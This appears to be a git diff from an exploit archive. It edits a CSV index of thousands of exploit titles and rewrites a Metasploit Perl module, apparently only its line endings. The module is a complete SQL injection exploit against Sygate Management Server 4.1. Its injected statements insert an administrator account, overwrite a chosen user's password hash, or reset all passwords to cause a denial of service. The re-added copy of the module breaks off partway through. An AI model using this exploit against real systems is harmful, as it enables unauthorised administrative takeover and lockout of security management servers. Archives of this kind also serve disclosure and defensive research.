10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
@ -11180,7 +11180,7 @@ id,file,description,date,author,platform,type,port
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0
@ -12628,7 +12628,7 @@ id,file,description,date,author,platform,type,port
14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0
14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0
14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
@ -13066,7 +13066,7 @@ id,file,description,date,author,platform,type,port
15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
@ -13182,7 +13182,7 @@ id,file,description,date,author,platform,type,port
15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0
15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0
15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0
15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0
15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
@ -14433,7 +14433,7 @@ id,file,description,date,author,platform,type,port
16650,platforms/windows/local/16650.rb,"Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)",2010-09-25,metasploit,windows,local,0
16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0
16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0
16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0
16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0
16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0
@ -14535,7 +14535,7 @@ id,file,description,date,author,platform,type,port
16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80
16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80
16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80
16755,platforms/windows/remote/16755.rb,"Novell iManager getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
16756,platforms/windows/remote/16756.rb,"Sambar 6 Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80
16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300
16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999
@ -14687,7 +14687,7 @@ id,file,description,date,author,platform,type,port
16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0
16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0
16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0
16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing Command Injection",2011-01-08,metasploit,linux,remote,0
16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0
16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0
16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0
16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0
@ -14762,7 +14762,7 @@ id,file,description,date,author,platform,type,port
16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0
16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
@ -14924,7 +14924,7 @@ id,file,description,date,author,platform,type,port
17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
17177,platforms/windows/local/17177.rb,"MS Word Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@ -15093,7 +15093,7 @@ id,file,description,date,author,platform,type,port
17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0
17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0
17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0
17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0
17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0
@ -15165,7 +15165,7 @@ id,file,description,date,author,platform,type,port
17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@ -15312,7 +15312,7 @@ id,file,description,date,author,platform,type,port
17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
@ -16632,7 +16632,7 @@ id,file,description,date,author,platform,type,port
19270,platforms/linux/local/19270.c,"Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0
19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0
19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0
19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0
19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0
19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0
@ -21635,7 +21635,7 @@ id,file,description,date,author,platform,type,port
24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0
24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
24467,platforms/windows/remote/24467.rb,"ActFax 5.01 RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0
24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0
24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yalç?n",windows,dos,0
@ -29184,3 +29184,22 @@ id,file,description,date,author,platform,type,port
32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
32416,platforms/php/remote/32416.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
32417,platforms/php/remote/32417.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0
32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0
32421,platforms/php/webapps/32421.html,"FlatPress 0.804 Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta 'register.php' SQL Column Truncation Unauthorized Access Vulnerability",2008-09-25,StAkeR,php,webapps,0
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0
32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0
32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0
32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0
32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 'wholite.cgi' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",cgi,webapps,0
32431,platforms/php/webapps/32431.txt,"Lyrics Script 'search_results.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0
32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0

Can't render this file because it is too large.

499
platforms/cgi/webapps/1680.pm
View file

@ -1,250 +1,249 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
##
#
# Affected product : Sygate Management Server v4.1 (at least)
#
# Vulnerability : SQL-Injection in login page
# Required privs : Network access to the admin interface (HTTP)
# Impact : Raw access to the database
# Sample payload : Create a valid admin account directly in the database
#
# Editor status : Official patch available
# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
#
##
package Msf::Exploit::sygate_policy_manager;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
use vars qw{$HAS_SHA1};
BEGIN
{
$HAS_SHA1 = 0;
if (eval('require Digest::SHA1')) {
eval('use Digest::SHA1 qw(sha1);');
$HAS_SHA1 = 1;
}
}
my $advanced = { };
my $info = {
'Name' => 'Sygate Management Server SQL Injection',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'Nicob <nicob[at]nicob.net>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'],
'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a non authenticated SQL-Injection vulnerability in the
Sygate Management Server (now Symantec Policy Manager), in order to create a new
admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
Version 5 is not vulnerable.
}),
'Refs' =>
[
['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
['CVE', '2006-0522'],
['OSVDB', '22883'],
['BID', '16452'],
],
'Targets' =>
[
['Change a specific users password', 'change_user_passwd'],
['Create a new administrative account', 'add_account'],
['Reset all passwords (denial of service)', 'reset_all'],
],
'DefaultTarget' => 0,
'Keys' => ['sygate'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $request =
"GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$self->PrintLine("[*] Establishing a connection to the target...");
$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ /HTTP\/1\..\s+200/) {
$self->PrintLine("[*] Vulnerable server detected!");
return $self->CheckCode('Confirmed');
} elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
$self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Generic error...");
return $self->CheckCode('Generic');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $login = $self->GetVar('LOGIN');
my $passwd = $self->GetVar('PASSWD');
my $target = $self->Targets->[$self->GetVar('TARGET')];
if (! $HAS_SHA1) {
$self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
return;
}
# The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
my $sha1 = sha1($login.$passwd);
$sha1 =~ s/./sprintf("%02x", ord($&))/ges;
$sha1 = "0x".uc($sha1);
# Maximum level of privileges
my $privs = "255";
my %sqlpayloads =
(
# Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
'add_account' =>
"insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
"AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
"values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
# Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
'reset_all' =>
"update CMS35.Admin set Password=cast('AA' as varbinary)",
# Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
'change_user_passwd' =>
"update CMS35.Admin set Password=$sha1 where LoginName='$login'",
);
my $payload = $sqlpayloads{ $target->[1] };
# Inject our payload
$servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo";
my $request =
"GET $servlet HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Establishing a connection to the target...");
$self->PrintLine(' ');
$s->Send($request);
my $results = $s->Recv(-1, 20);
if ($results =~ /HTTP\/1\.. 200 OK/im) {
# Seems to be fine ;-)
$self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
} else {
$self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
}
$s->Close();
return;
}
sub URLEncode {
my $self = shift;
my $data = shift;
my $res;
foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}
sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}
1;
# milw0rm.com [2006-04-15]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
##
#
# Affected product : Sygate Management Server v4.1 (at least)
#
# Vulnerability : SQL-Injection in login page
# Required privs : Network access to the admin interface (HTTP)
# Impact : Raw access to the database
# Sample payload : Create a valid admin account directly in the database
#
# Editor status : Official patch available
# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
#
##
package Msf::Exploit::sygate_policy_manager;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
use vars qw{$HAS_SHA1};
BEGIN
{
$HAS_SHA1 = 0;
if (eval('require Digest::SHA1')) {
eval('use Digest::SHA1 qw(sha1);');
$HAS_SHA1 = 1;
}
}
my $advanced = { };
my $info = {
'Name' => 'Sygate Management Server SQL Injection',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'Nicob <nicob[at]nicob.net>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'],
'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a non authenticated SQL-Injection vulnerability in the
Sygate Management Server (now Symantec Policy Manager), in order to create a new
admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
Version 5 is not vulnerable.
}),
'Refs' =>
[
['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
['CVE', '2006-0522'],
['OSVDB', '22883'],
['BID', '16452'],
],
'Targets' =>
[
['Change a specific users password', 'change_user_passwd'],
['Create a new administrative account', 'add_account'],
['Reset all passwords (denial of service)', 'reset_all'],
],
'DefaultTarget' => 0,
'Keys' => ['sygate'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $request =
"GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
